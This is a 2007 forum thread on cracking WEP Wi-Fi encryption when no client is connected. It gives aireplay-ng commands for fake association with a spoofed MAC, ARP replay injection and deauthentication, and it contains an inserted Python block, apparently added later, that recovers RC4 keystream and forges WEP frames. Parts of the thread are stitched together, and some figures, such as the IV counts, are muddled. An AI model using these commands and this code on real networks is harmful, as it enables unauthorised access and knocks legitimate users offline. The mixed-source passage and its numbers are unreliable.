
Understanding WEP cracking with no clients


john12312
03-17-2007, 06:48 PM
What exactly are IVs?

In airodump, if I am making a fake client, then should this show up, i.e. if there is only one router I'm trying to crack and no other clients, should I see 2 MACs (the AP and the fake client)?

How would I get another client showing up in airodump?

Can someone direct me to the best place to research WEP cracking with no other clients?

Cheers

Baxter
03-17-2007, 07:50 PM
Yo, I read the other post when you were asking about the same thing and I wanted to know myself. I don't have the link, but I did find this.
Producing encrypted packets for WEP breaking - No Client Present:

This attack is only useful when you need an associated MAC address and there is currently no associated client. However, it is generally better to use the MAC address of a real client, as in the "Producing encrypted packets for WEP breaking - Client Present" attack.

Open a console and start airodump:

airodump-ng -w [filename] -c [channel] [interface]

"Some access points require reassociation every 30 seconds, otherwise our fake client is considered disconnected." Open a second console and setup the associate/reassociate to the access point:

aireplay-ng -1 20 -e [ESSID] -a 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface]

If the association stops you may need to restart it manually; however, after a while, even though the association requests (aireplay -1 20) had stopped, encrypted packets were still being collected OK.

Now open a third console and start listening for ARP requests with the -3 option:

aireplay-ng -3 -b 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface]

It may take a little time to pick up some ARP packets initially; if successful, airodump should now be collecting encrypted packets at a rate of roughly 3,000/min.

Receiving no ARP requests?

If after some time aireplay is still stalling on "(got 0 ARP requests)", you can attempt to speed this process up with some deauths (e.g. aireplay -0 10...., as below) followed by some more auths (e.g. aireplay -1 20...., as below).

aireplay-ng -0 10 -a 11:11:11:11:11:11 -c 33:33:33:33:33:33 [interface] (Deauth)

aireplay-ng -1 20 -e [ESSID] -a 11:11:11:11:11:11 -h 33:33:33:33:33:33 [interface] (Association request)

If you keep waiting while it sends association requests, it should start collecting them after a while.
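The procedure above, and the "What exactly are IVs?" question in the opening post, as an added worked example that is not code from the thread or from the aircrack-ng project: a toy model of a WEP frame body showing that the 24-bit IV is sent in the clear and prepended to the shared key to form the per-frame RC4 key, that a CRC-32 ICV is what the AP checks, and that known plaintext for one IV (an ARP request has a fixed LLC/SNAP header and mostly predictable fields) yields that IV's keystream without the key. The 40-bit key, the IVs and the ARP-like payload are constructed sample values, not captured traffic.

```python
"""Added example (not from the thread): a minimal model of WEP's
per-frame encryption, to show what an IV is, why a cracker needs a
large number of distinct ones, and what ARP replay exploits.
The key, IVs and ARP-like payload are constructed sample values."""
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # fixed 8-byte header on every ARP frame


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream (KSA + PRGA), the stream cipher WEP uses."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air:
    IV (3 bytes, in the clear) || key-id byte || RC4(IV||key) xor (plaintext || ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    ks = rc4(iv + wep_key, len(plaintext) + 4)
    body = bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), ks))
    return iv + b"\x00" + body


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return (plaintext, icv_ok). The receiver rebuilds the per-frame key from the clear IV."""
    iv, body = frame[:3], frame[4:]
    pt = bytes(a ^ b for a, b in zip(body, rc4(iv + wep_key, len(body))))
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext for one IV gives that IV's keystream without knowing the key."""
    return bytes(c ^ p for c, p in zip(frame[4:], known_plaintext + icv(known_plaintext)))


def forge_frame(frame: bytes, known_plaintext: bytes, new_plaintext: bytes) -> bytes:
    """Reuse keystream recovered from one captured frame to encrypt a new message
    under the same IV. The AP accepts it (valid ICV) because nothing forbids IV reuse."""
    if len(new_plaintext) > len(known_plaintext):
        raise ValueError("keystream is only known for len(known_plaintext)+4 bytes")
    ks = recover_keystream(frame, known_plaintext)
    pt = new_plaintext + icv(new_plaintext)
    return frame[:4] + bytes(p ^ k for p, k in zip(pt, ks))


def unique_ivs(frames) -> int:
    """What airodump-ng's IV count measures: distinct IVs seen for one BSSID."""
    return len({f[:3] for f in frames})


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")  # constructed 40-bit ("64-bit") WEP key
    arp = LLC_SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01" + b"\xaa" * 20  # ARP-like payload
    frames = [wep_encrypt(key, iv.to_bytes(3, "big"), arp) for iv in range(3)]
    print("unique IVs seen:", unique_ivs(frames))
    ks = recover_keystream(frames[0], arp)
    print("keystream == RC4(IV||key):", ks == rc4(b"\x00\x00\x00" + key, len(arp) + 4))
    forged = forge_frame(frames[0], arp, b"\x11" * len(arp))
    print("forged frame decrypts with valid ICV:", wep_decrypt(key, forged)[1])
```

The replayed ARP request in the aireplay -3 step reuses its own IV; the fresh IVs that airodump counts come from the AP's encrypted replies and rebroadcasts, each under a new IV, which is why a single captured request is enough to drive the counter up without any legitimate client.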

john12312
03-18-2007, 12:07 AM
Cheers for the reply. I actually got some ARP requests and 8 IVs (initialization vectors; not enough for 64-bit (need 250)) using your code.

Would it be better to use the fake or the current MAC for the 33:33:33:33:33:33 you put down? It's just that these are the options I find in macchanger.

I'm working with a different card now that supports packet injection for sure.

Baxter
03-18-2007, 03:07 PM
I know just as much as you. Im a big noob trying to help another noob. its like the blind leading the blind. You dont need to use 33:33:33:33:33:33. use anything you like. 11:11:11:11:11:11 was an example. you would put the Routers MAC there. You dont really need to inject packets to crack your wep. i cracked my wep without injecting any packets. it took 40min to collect 300,000 IVs and 10min to crack the 64bit wep. i know thats slow but i dont care, i got it in the end.